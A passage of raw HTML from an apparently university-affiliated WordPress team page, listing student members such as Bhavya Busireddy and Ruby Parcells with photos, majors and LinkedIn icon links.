161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n            <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c182\" class=\"d-block style-922 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c182-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c182-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c183\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"style-923 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c186-outer\">\n            <div data-colibri-id=\"182-c186\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c186 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c187\" class=\"d-block style-913 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c187-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c187-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-914 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c188\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-text h-text-component style-915 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"style-917 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c191-outer\">\n            <div data-colibri-id=\"182-c191\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c191 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c192\" class=\"d-block style-913 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c192-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c192-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-global-transition-all h-heading style-914 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c193\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"h-text h-text-component style-915 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c195\" class=\"style-917 style-local-182-c195 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c196-outer\">\n            <div data-colibri-id=\"182-c196\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c196 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c197\" class=\"d-block style-913 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c197-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c197-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-global-transition-all h-heading style-914 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c198\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-915 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-917 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c201-outer\">\n            <div data-colibri-id=\"182-c201\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c201 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c202\" class=\"d-block style-913 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c202-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c202-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-global-transition-all h-heading style-914 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c203\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"h-text h-text-component style-915 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c205-outer\">\n            <div data-colibri-id=\"182-c205\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c205 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c206\" class=\"d-block style-913 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c206-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c206-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-global-transition-all h-heading style-914 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c207\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"h-text h-text-component style-915 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"style-917 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"d-block style-913 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c211-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c211-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c212\" class=\"h-global-transition-all h-heading style-914 style-local-182-c212 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c212\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c213\" class=\"h-text h-text-component style-915 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"style-917 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c215-outer\">\n            <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c215 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c216\" class=\"d-block style-913 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c216-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c216-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c217\" class=\"h-global-transition-all h-heading style-914 style-local-182-c217 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c217\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c218\" class=\"h-text h-text-component style-915 style-local-182-c218 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c219\" class=\"style-917 style-local-182-c219 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons 